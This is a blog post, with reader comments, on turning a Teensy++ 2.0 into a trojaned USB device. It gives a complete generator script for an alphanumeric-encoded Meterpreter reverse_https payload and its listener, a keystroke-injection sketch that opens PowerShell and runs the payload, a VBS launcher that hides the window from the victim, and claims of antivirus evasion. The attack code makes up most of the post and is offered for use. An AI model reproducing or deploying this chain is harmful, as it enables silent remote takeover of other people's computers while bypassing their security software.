Getting past anti-virus software so that our payloads can be executed off the Teensy is the next exercise. Lately most of the Metasploit-generated loaders get detected. There are various techniques to bypass this detection; I stumbled across Bernardo Damele's blog post and decided to use his technique on a Teensy++ 2.0.
The original article is here: execute-metasploit-payloads-bypassing.html
All the steps here are already covered in the previous article, Teensy2-0-and-metasploit. So once again, with our Teensy and the Arduino programming environment set up on our Linux box, we create a new project, "trojaned_usbdrive" for example.
Our generator script is a little different from last time (again, place it in the Metasploit root folder):
    #!/bin/bash
    echo "************************************************************"
    echo "              Automatic shellcode generator                 "
    echo "                                                            "
    echo "************************************************************"
    echo -e "What Port Number are we gonna listen to? : \c"
    read port

    # Get OS name
    OS=`uname`
    IP=""

    # Store the IP of the listening interface (tun0 here; change it to match your setup)
    case $OS in
    Linux) IP=`ifconfig tun0 | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` ;;
    FreeBSD|OpenBSD) IP=`ifconfig tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
    SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
    *) IP="Unknown" ;;
    esac
    #echo "$IP"

    # reverse_https Meterpreter stager, encoded as pure alphanumeric text (x86/alpha_mixed).
    # BufferRegister=EAX drops the non-alphanumeric "find my own address" prefix, so the
    # decoder expects EAX to point at the buffer when it starts (which is what the loader does).
    ./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -e x86/alpha_mixed -t raw BufferRegister=EAX > alphacode

    if [ ! -d ShellCode ]; then
        mkdir ShellCode
    fi
    mv alphacode ShellCode

    # run.bat is one line: "a.exe <alphanumeric shellcode>", without a trailing newline
    echo -e "a.exe \c" > ShellCode/run.bat
    cat ShellCode/alphacode >> ShellCode/run.bat
    rm ShellCode/alphacode
    mv ShellCode/run.bat /home/knoppix/arduino-0022/trojaned_usbdrive/disk

    # Start the handler; migrate as soon as the session comes in
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate explorer.exe' E
We use the x86/alpha_mixed encoder to produce the Meterpreter shellcode. The script generates a windows/meterpreter/reverse_https payload, pipes it through msfencode with x86/alpha_mixed so that the output consists of alphanumeric characters only, and dumps it as alphacode in the ShellCode subdirectory, where run.bat is created as well: a single line with the loader name followed by the shellcode as its one argument. BufferRegister=EAX tells the encoder to leave out the non-alphanumeric stub that would otherwise locate the buffer, so the decoder relies on EAX pointing at the shellcode when it runs, which is what the shellcodeexec loader used below is written to expect. The script then moves run.bat into the disk folder of the trojaned_usbdrive project in your Arduino installation and starts the multi/handler listener (with AutoRunScript='migrate explorer.exe', so the session migrates out of the loader process once it connects).
Next we need the shellcodeexec Win32 binary from github.com/inquisb/shellcodeexec (the sources are there too, and you can build an x64 version). In this example I named the file a.exe and moved it into the disk folder of the trojaned_usbdrive project.
Next comes the Teensy++ 2.0 sketch that types everything in:
    #include <phukdlib.h>

    void setup() {
    }

    void loop() {
      delay(9000);                        // give the host time to enumerate the keyboard and the disk

      // Ctrl+Esc opens the Start menu; what we type next goes into the search box
      Keyboard.set_modifier(MODIFIERKEY_CTRL);
      Keyboard.send_now();
      Keyboard.set_key1(KEY_ESC);
      Keyboard.send_now();
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      Keyboard.print("powershell");
      PressAndRelease(KEY_ENTER, 1);
      delay(8000);                        // wait for the PowerShell console to come up

      // find the drive letter of the Teensy's disk by its volume label ("tinydisk")
      Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
      PressAndRelease(KEY_ENTER, 1);
      delay(1000);
      Keyboard.print("$drive = $disk.substring(2,2)");
      PressAndRelease(KEY_ENTER, 1);
      delay(1000);
      Keyboard.print("cd $drive");
      PressAndRelease(KEY_ENTER, 1);
      delay(500);

      // run <drive>\exec.vbs; the backslash is sent as a raw key press and released again
      Keyboard.print("invoke-expression $drive");
      Keyboard.set_key1(KEY_BACKSLASH);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      Keyboard.print("exec.vbs");
      PressAndRelease(KEY_ENTER, 1);
      delay(1000);
      Keyboard.print("exit");
      PressAndRelease(KEY_ENTER, 1);

      delay(9000000);                     // done; park here so the sequence is not typed again
    }
Our exec.vbs is almost the same as before; it launches run.bat from its own folder with a hidden window, so the whole process stays invisible to the user:
    ' Launch run.bat from the folder this script lives in, with no visible window
    Set oShell = CreateObject("Wscript.shell")
    sPath = Wscript.ScriptFullName
    x = InstrRev(sPath, "\")
    sPath = Left(sPath, x)              ' directory of exec.vbs, trailing backslash kept
    sCmd = sPath + "run.bat"
    oShell.Run sCmd, 0, False           ' 0 = hidden window, False = do not wait for it
So you need three files in the disk folder of the trojaned_usbdrive project: a.exe, run.bat and exec.vbs. When this runs it is fast and silent, and it does not leave much noise on the screen.
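As an added example (not part of the original post or of the shellcodeexec project), the shell functions below do the checks I would run on the disk folder before flashing the Teensy, covering both the generator output and the final three-file layout: that the msfencode output really is pure alphanumeric text (the loader receives it as argv[1], so a stray newline, a NUL or the non-alphanumeric prefix you get without BufferRegister=EAX would break the handoff), that the run.bat line stays under cmd.exe's 8191-character command-line limit, and that a.exe, run.bat and exec.vbs are all present with run.bat in the expected "a.exe <shellcode>" form. The loader name a.exe and the one-line run.bat layout are taken from the post; the blobs written by selftest are constructed stand-ins, not real shellcode.

```shell
#!/bin/sh
# Pre-flight checks for the Teensy "disk" folder (added example, not the
# original post's generator). Assumes, as in the post, that the loader is
# a.exe, that run.bat is the single line "a.exe <shellcode>", and that the
# shellcode file is raw msfencode x86/alpha_mixed output with no newline.
LC_ALL=C; export LC_ALL

# cmd.exe will not run a command line longer than 8191 characters.
CMD_LINE_MAX=8191

# is_alnum_blob FILE : succeed only if FILE is non-empty and holds nothing but
# [A-Za-z0-9]. Anything else (newline, NUL, a non-alphanumeric decoder prefix)
# cannot be handed to the loader on the command line intact.
is_alnum_blob() {
    f="$1"
    [ -s "$f" ] || return 1
    left=$(tr -d 'A-Za-z0-9' < "$f" | wc -c | tr -d ' ')
    [ "$left" -eq 0 ]
}

# build_runbat BLOB OUTFILE [LOADER] : write "LOADER <blob>" (CRLF-terminated)
# to OUTFILE. Fails if the blob is not alphanumeric or the line is too long.
build_runbat() {
    blob="$1"; out="$2"; loader="${3:-a.exe}"
    if ! is_alnum_blob "$blob"; then
        echo "refusing: $blob is not pure alphanumeric" >&2
        return 1
    fi
    line="$loader $(cat "$blob")"
    if [ "${#line}" -gt "$CMD_LINE_MAX" ]; then
        echo "refusing: command line would be ${#line} chars (limit $CMD_LINE_MAX)" >&2
        return 1
    fi
    printf '%s\r\n' "$line" > "$out"
}

# check_disk_dir DIR [LOADER] : the folder must contain the loader, run.bat and
# exec.vbs, and the first line of run.bat must be the loader followed by exactly
# one alphanumeric argument.
check_disk_dir() {
    dir="$1"; loader="${2:-a.exe}"
    for f in "$loader" run.bat exec.vbs; do
        if [ ! -f "$dir/$f" ]; then
            echo "missing $dir/$f" >&2
            return 1
        fi
    done
    cr=$(printf '\r')
    IFS=' ' read -r first rest < "$dir/run.bat" || true   # a missing final newline is fine
    rest="${rest%"$cr"}"
    if [ "$first" != "$loader" ]; then
        echo "run.bat does not start with $loader" >&2
        return 1
    fi
    case "$rest" in
        ''|*[!A-Za-z0-9]*) echo "run.bat argument is not a single alphanumeric token" >&2; return 1 ;;
    esac
    return 0
}

# selftest : exercise the checks on constructed stand-ins (not real shellcode).
selftest() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/disk"
    printf 'PYIIIICONSTRUCTEDSAMPLE0123456789abcxyz' > "$tmp/alphacode"   # constructed, alphanumeric only
    printf 'PYIII\211\342CONSTRUCTED' > "$tmp/badcode"                    # constructed, contains raw bytes
    : > "$tmp/disk/a.exe"; : > "$tmp/disk/exec.vbs"                      # empty placeholders
    is_alnum_blob "$tmp/alphacode" || return 1
    if is_alnum_blob "$tmp/badcode"; then return 1; fi
    build_runbat "$tmp/alphacode" "$tmp/disk/run.bat" || return 1
    if build_runbat "$tmp/badcode" "$tmp/disk/bad.bat" 2>/dev/null; then return 1; fi
    check_disk_dir "$tmp/disk" || return 1
    rm -rf "$tmp"
}
```

Source the file from the Metasploit folder after the generator has produced ShellCode/alphacode, call build_runbat on it with the disk folder's run.bat as the output path, then run check_disk_dir on the disk folder; selftest runs the same checks against the constructed samples so you can confirm the script itself behaves before trusting it with real output.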
This should get past most antivirus software undetected (tested against Trend Micro, Kaspersky, ...). A result like that is a snapshot, though: the loader binary is what gets scanned, and vendors add signatures for published tools over time, so re-test against the target's AV before relying on it.
Part 3… The Final Product
Hi,
I get a different character when I connect the Teensy to the USB: I get an ì instead of '=' and cannot execute the code... How can I get a = (equals) instead of ì?
Thanks
Hi
Where exactly do you have the problem with the equals sign? Is it in the Keyboard.print("$disk = wmic ...") command? If that is the case you can split the command and use KEY_EQUAL instead. Look here for info:
http://www.pjrc.com/teensy/usb_keyboard.html
So you would do this :
    Keyboard.print("$disk ");
    Keyboard.set_key1(KEY_EQUAL);
    Keyboard.send_now();          // press the key at the '=' position
    Keyboard.set_key1(0);
    Keyboard.send_now();          // and release it again
    Keyboard.print(" wmic logicaldisk list brief | sel...");
etc….
Hi,
Thanks for the reply. I tried what you suggested but I get the same result.
I resolved the problem by changing the keyboard layout in Windows to English. With my default Italian keyboard I get bad characters; with English the Teensy works :)
Thanks again for the reply.